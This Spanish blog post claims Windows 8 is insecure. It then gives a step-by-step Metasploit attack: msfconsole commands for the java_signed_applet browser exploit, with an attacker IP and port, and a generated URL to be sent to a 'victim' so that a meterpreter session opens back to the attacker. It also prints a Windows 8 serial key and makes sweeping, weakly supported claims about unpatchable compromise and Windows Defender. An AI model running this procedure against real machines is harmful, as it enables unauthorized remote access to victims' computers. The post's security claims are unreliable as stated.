Segun Wikipedia: Windows
8 es la versión actual del sistema operativo de Microsoft Windows,
producido por Microsoft para su uso en computadoras personales,
incluidas computadoras de escritorio en casa y de negocios, computadoras
portátiles, netbooks, tabletas, servidores y centros multimedia. Añade
soporte para microprocesadores ARM, además de los microprocesadores
tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido
modificada para hacerla más adecuada para su uso con pantallas táctiles,
además de los tradicionales ratón y teclado.
Segun Yo: La seguridad
que ofrece Microsoft en esta nueva version de Windows, es la misma que
se obtiene al instalar Windows 7, esto se debe a que efectivamente solo
ha cambiado la interfaz grafica y ha añadido nuevos programas que lo
hace mas vulnerable, simplemente por ser una version parecida a los que
usan los Telefonos Moviles. La actualizacion automatica que brinda, solo
sirve para actualizar el Internet Explorer y los servicios (Redes
Sociales - Correo y Multimedia). El Windows Defender que se integra por
default, no detecta las URL maliciosas (Exploits Kit's) ni mucho menos
cuando se intenta descargar algun archivo ejecutable, solamente se
pronuncia el aviso que brindan los navegadores "Desea descargar este Archivo (Permitir - Rechazar)" que es lo unico que al menos nos alerta de un supuesto Malware, por lo que simplemente Windows 8 seria el WINDOWS XP 2012.
Llegando a la conclusion y opinion personal
sobre Windows 8, decide realizar las pruebas respectivas para comprobar
realmente y estar 100% seguro de lo mencionado lineas arriba. Para tal
caso me base en la vulnerabilidad que se puede aprovechar en todos los
navegadores, la cual consiste en ejecutar cualquier URL que genera el
Metasploit para poder penetrar un Windows actualizado y parcheado.
El procedimiento que realize para comprometer la seguridad de Windows 8 son los siguientes:
REQUERIMIENTOS:
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)Windows 8 (Victima)
Google Chorme, Firefox o IE (Victima)
PROCEDIMIENTO DEL ATAQUE:
Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_signed_applet (Modulo Java para diferentes navegadores)
set lhost 192.168.1.17 (IP del Atacante)
set lport 80 (Puerto)
set uripath / (Path del link a enviar)
exploit
------------------------------------------------------------------------------------------------------------------
Despues de ejecutar los comandos mencionados, MSF generara una URL (http://192.168.1.17:8080) que sera enviada a la victima con Windows 8, esta contendra un archivo (.exe) que se autoejecutara al momento de abrirlo en cualquier navegador web, ya sea en Internet Explorer 10 (version que integra Windows 8) Google Chorme, Opera o Firefox.
He aqui un ejemplo de la session meterpreter que se crea al momento de ejecutar la URL generada por Metasploit:
Esto quiere decir que hemos VULNERADO el Windows 8 con
una simple URL, seguidamente ejecutaremos los comandos correspondientes
para obtener la informacion del sistema.
Las pruebas fueron realizadas en el Sistema Operativo Windows 8 con el
Firewall, Windows Defender, Actualizaciones Automaticas, Internet
Explorer 10 (modo seguro) respectivamente ACTIVADO.
Si desean realizar sus propias Pruebas de Seguridad, pueden descargar el
Windows 8 e instalarlo en una Maquina Virtual, recomendable usar el VMWARE, los .iso se encuentran disponibles desde los siguientes link's:
- Windows 8 | 32 Bits
- Windows 8 | 64 Bits
- Serial: TK8TP-9JN6P-7X7WW-RFFTV-B7QPF
Saludos.
0 comentarios:
Publicar un comentario